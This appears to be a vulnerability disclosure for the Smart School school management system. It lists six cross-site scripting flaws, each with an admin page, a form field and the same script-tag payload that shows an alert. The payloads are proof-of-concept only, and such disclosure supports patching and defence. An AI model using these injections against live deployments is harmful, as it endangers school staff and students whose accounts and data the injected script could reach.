# Title: Smart School : School Management System > All vers affected
# Author: @Eawhitehat - Eren Arslan
# Vendor: https://smart-school.in/
# Demo available : https://demo.smart-school.in/site/login#
# Software Link: https://smart-school.in/
# CVE: N/A
# Multiple XSS
- XSS 1 :
Connect to panel Smart School panel,
Paste to search : "><script>alert(/eawhitehat is here/)</script>
- XSS 2 :
Connect to panel Smart School Panel,
Go to /admin/generalcall
In the "name" enter the following payload:
"><script>alert(/eawhitehat is here/)</script>
The rest of the information can be wrong information then save
- XSS 3 :
Connect to panel Smart School Panel,
Go to /admin/dispatch
In the "title" enter the following payload:
"><script>alert(/eawhitehat is here/)</script>
The rest of the information can be wrong information then save
- XSS 4 :
Connect to panel Smart School Panel,
Go to /admin/receive
In the "title" enter the following payload:
"><script>alert(/eawhitehat is here/)</script>
The rest of the information can be wrong information then save
- XSS 5 :
Connect to panel Smart School Panel,
Go to /admin/complaint
In the "Complain By" enter the following payload:
"><script>alert(/eawhitehat is here/)</script>
The rest of the information can be wrong information then save
- XSS 6 :
Connect to panel Smart School Panel,
Go to /admin/visitorspurpose
In the "Purpose" enter the following payload:
"><script>alert(/eawhitehat is here/)</script>
The rest of the information can be wrong information then save